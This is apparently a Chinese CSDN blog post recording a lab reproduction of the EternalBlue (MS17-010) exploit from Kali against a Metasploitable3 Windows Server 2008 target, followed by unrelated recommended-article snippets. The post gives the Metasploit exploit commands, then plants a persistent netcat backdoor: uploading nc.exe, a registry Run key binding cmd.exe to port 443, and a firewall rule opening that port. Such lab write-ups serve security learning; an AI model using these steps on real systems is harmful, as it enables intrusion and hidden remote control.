永恒之蓝复现植入NC

最新推荐文章于 2024-11-13 17:04:43 发布
最新推荐文章于 2024-11-13 17:04:43 发布
阅读量276 收藏
点赞数
文章标签: windows linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51631141/article/details/128318211
版权

一次记录


🎈: 简单的操作却被自己搞的相当复杂,真是菜到家了。
准备工作:
攻击机:kali Linux 2021。 IP:192.168.47.48
靶机: windows Server 2008 (metasploitable3-win2k8) IP:192.168.47.106

一、永恒之蓝

测试指令:
search ms17_010
use 3
set rhosts 192.168.47.106
run

在这里插入图片描述
exp选取:
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.47.106
run
攻击
在这里插入图片描述
靶机已上号!!!

二、nc植入

upload /usr/share/windows-binaries/nc.exe C:\windows\system32

上传nc.exe

在这里插入图片描述
上传成功!!!

修改注册表

指令:
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d ‘C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe’
在这里插入图片描述
success!!!

定义防火墙规则

指令:
使用 shell加入win模式
netsh advfirewall firewall add rule name=“test443” protocol=TCP dir=in localport=443 action=allow
在这里插入图片描述
配置成功!!!!
重新启动靶机刷新配置(可手动)

三、nc侦听

指令:
nc -v 192.168.47.106 443
在这里插入图片描述

海思3516DV300智能算法实现
xiaoning132的专栏
08-07 754
海思3516DV300智能算法实现
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
永恒之蓝配合nc植入后门【笔记】
星落
12-15 566
永恒之蓝nc的配合植入后门并反弹shell
海康设备网络SDK开发NET_DVR_GetDeviceConfig
dragonzoebai的专栏
06-01 5696
由于官方的例子中没有关于NET_DVR_GetDeviceConfig的示例,在此记录一下“NET_DVR_GET_FIELD_DETECTION 获取区域入侵侦测配置,避免其他小伙伴踩坑。
海康威视错误代码0xf_海康威视视频智能分析整理文档
weixin_39672979的博客
12-20 1787
海康威视摄像头分析1)行为分析方法:VCA_RULE_EVENT_TYPE_EX行为分析事件类型枚举。enum _VCA_RULE_EVENT_TYPE_EX_{ENUM_VCA_EVENT_TRAVERSE_PLANE = 1,ENUM_VCA_EVENT_ENTER_AREA = 2,ENUM_VCA_EVENT_EXIT_AREA = 3,ENUM_VCA_EVENT_INTRUSION =...
STM32笔记--SDIO(SD卡读取)
VCA821的博客
06-19 1万+
学习这里首先要了解一下SD卡基本资料:SD卡的协议部分太多,也比较复杂,建议资料:《Simplified_Physical_Layer_Spec.pdf》其主要复杂在繁多的命令,一共有64个命令,各个命令代表什么可查资料。我们代码中一般用到的是ARM官方给的SD卡的库,但是库中存在问题,...
永恒之蓝漏洞复现(详细版)
Zqinglele的博客
03-20 3831
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
永恒之蓝漏洞复现(ms17-010)
weixin_43913009的博客
04-01 2万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、永恒之蓝(Eternal Blue)二、复现环境三、复现过程1.主机发现2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(Eternal Blue) 永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏.
永恒之蓝(MS17-010)漏洞复现
tubug的博客
05-21 7187
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。.........
漏洞CNNVD-201805-248的复现与提权
weixin_43434933的博客
06-23 1132
实验原理介绍(图文) 本次实验实现漏洞CNNVD-201805-248的复现与入侵,以及后续的提权管理员和留后门操作。 漏洞基本信息: 漏洞名称:Microsoft Windows VBScript 引擎安全漏洞 CNNVD编号:CNNVD-201805-248 CVE编号:CVE-2018-8174 危害等级:高危 漏洞类型:缓冲区错误 威胁类型:远程 发布时间:2018-05-10 漏洞简...
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
永恒之蓝 MS17-010漏洞复现
热门推荐
MX的博客
10-07 3万+
永恒之蓝 MS17-010漏洞复现 文章目录永恒之蓝 MS17-010漏洞复现一:漏洞原理1:简介2:漏洞原理代码详解二:漏洞复现1:信息收集 一:漏洞原理 1:简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无,S...
c# 在10万条数据中判断是否存在很慢问题
qtvb1987的专栏
11-12 472
查询10万条数据是否存在会很慢,因为这会导致线性搜索,时间复杂度为O(n)。// 假设我们查找的数据。如果列表是有序的,可以使用二分查找,这样可以将查询时间从O(n)降低到O(log n)。进行查询时,如果列表非常大(例如10万条数据),查询性能可能会变慢。来存储需要查询的数据,这样可以将查询时间从O(n)降低到O(1)。如果查询操作是频繁的,可以考虑使用更适合大数据量查询的数据结构,如。// 使用List.Where进行同样的查找。// 填充数据... (假设已经填充了10万条数据)
python 数据类型----可变数据类型
最新发布
Java_fenxiang的博客
11-13 759
一、list列表类型:一种有序集合,里面有多个数据用逗号隔开,可以对数据进行追加、插入、删除和替换;使用[]标识,可以包含任意数据类型登录后复制 # 字符串类型列表 names=['bill','may','jack'] #整数型列表 numbers = [1,2,34,4] #混合类型列表 values=['Bil...
stream学习
m0_62404686的博客
11-11 364
stream流的学习
Windows】CMD命令学习——系统命令
一个写了10年bug的程序员日常笔记。
11-07 1514
CMD(命令提示符)是Windows操作系统中的一个命令行解释器,允许用户通过输入命令来执行各种系统操作。
使用API有效率地管理Dynadot域名,列表形式查看账户whois联系人信息
Dynadot_tech的博客
11-12 856
Dynadot是通过ICANN认证的域名注册商,自2002年成立以来,服务于全球108个国家和地区的客户,为数以万计的客户提供简洁,优惠,安全的域名注册以及管理服务。Dynadot.com提供的API是专为效率而构建的高级域名管理和获取工具包。在Dynadot平台上,我们提供了50多个命令来设置,管理,注册和竞标域名。使用Dynadot API,可以以列表形式查看账户中已经存在的Whois联系人信息。
jdk8 有哪些新特性?
BBBBB____的博客
11-11 840
提供了一种简洁的方式来表示匿名方法(即没有名称的方法)。Lambda表达式可以用来创建仅有一个抽象方法的接口的实例,这种接口被称为函数式接口。优点:简化代码:Lambda表达式允许我们使用更简洁的方式表示匿名函数,减少了代码的冗余和复杂性函数式编程风格:支持函数式编程,使得代码更加容易理解和维护。提高可读性:通过减少样板代码,提高了代码的可读性和可维护性默认方法是接口中带有默认实现的方法,使用default关键字修饰。默认方法允许在不破坏现有实现的情况下,向接口中添加新的方法。
渗透测试基础与永恒之蓝复现
同时,特别提到了永恒之蓝漏洞的复现,该漏洞主要影响Windows 7系统,并与ms17-010补丁相关。文档内容还涵盖了情报搜集、威胁建模和漏洞分析等关键步骤。" 渗透测试是网络安全领域中至关重要的一环,它通过模拟黑客...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

让我在看看

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值